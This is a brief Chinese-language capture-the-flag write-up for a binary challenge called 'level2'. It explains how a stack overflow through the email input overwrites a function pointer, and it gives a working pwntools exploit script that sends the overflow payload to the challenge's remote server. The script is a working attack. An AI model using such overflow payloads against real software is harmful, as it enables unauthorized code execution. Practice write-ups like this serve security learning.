1.題目
2.IDA分析
3.流程分析
流程:輸入名字,郵箱,郵箱校驗完,執行v3+--v14處的代碼,v3原本指向sub_8048604的,我們發現sub_80486CC才是我們需要運行的函式,
思路:①為了避免v14影響結果,輸入字符避免進入case判斷,②通過輸入郵箱進行堆疊溢位覆寫v3的內容,使它指向sub_80486CC,exp如下:
from pwn import *
#io = process('./level2')
io = remote('220.249.52.133', 54079)
payload = 'A' * 0x20 + p32(0x080486cc)
io.sendlineafter("What is your name?\n> ","yangns")
io.sendlineafter("Enter the string to be validate\n> ",payload)
io.interactive()
轉載請註明出處,本文鏈接:https://www.uj5u.com/yidong/157329.html
標籤:其他
上一篇:【密碼學原理】RSA演算法